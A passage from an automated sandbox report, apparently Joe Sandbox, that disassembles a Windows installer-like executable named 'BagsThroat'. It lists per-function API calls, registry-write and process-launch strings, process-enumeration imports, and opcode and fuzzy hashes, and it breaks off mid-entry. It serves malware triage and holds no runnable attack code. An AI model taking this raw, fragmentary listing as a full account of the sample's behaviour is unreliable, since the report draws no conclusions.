                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                        • API String ID: 20674999-2124804629
                                        • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                        • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                        • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                        • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                        Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                        • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                        • GetSysColor.USER32(?), ref: 004041DB
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                        • lstrlenW.KERNEL32(?), ref: 00404202
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                          • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                          • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                        • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                        • SendMessageW.USER32(00000000), ref: 0040427D
                                        • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                        • SetCursor.USER32(00000000), ref: 004042FE
                                        • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                        • SetCursor.USER32(00000000), ref: 00404322
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                        • String ID: F$N$open
                                        • API String ID: 3928313111-1104729357
                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                        Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                        • wsprintfA.USER32 ref: 00406B79
                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                        • API String ID: 565278875-3368763019
                                        • Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                        • Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                        Download Yara Rule
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                        • DeleteObject.GDI32(?), ref: 004010F6
                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                        • DeleteObject.GDI32(?), ref: 0040116E
                                        • EndPaint.USER32(?,?), ref: 00401177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                        Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                        • API String ID: 1641139501-220328614
                                        • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                        • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                        Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                        • API String ID: 3734993849-3206598305
                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                        Strings
                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                        • String ID: created uninstaller: %d, "%s"
                                        • API String ID: 3294113728-3145124454
                                        • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                        • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                        Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                        Strings
                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                        • `G, xrefs: 0040246E
                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                        • API String ID: 1033533793-4193110038
                                        • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                        • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                        • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                        • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                        Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                        • GetSysColor.USER32(?), ref: 00403E57
                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                        • DeleteObject.GDI32(?), ref: 00403E81
                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                        • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                        • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                        • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                        Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                          • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                        Strings
                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                        • Exec: success ("%s"), xrefs: 00402263
                                        • Exec: command="%s", xrefs: 00402241
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
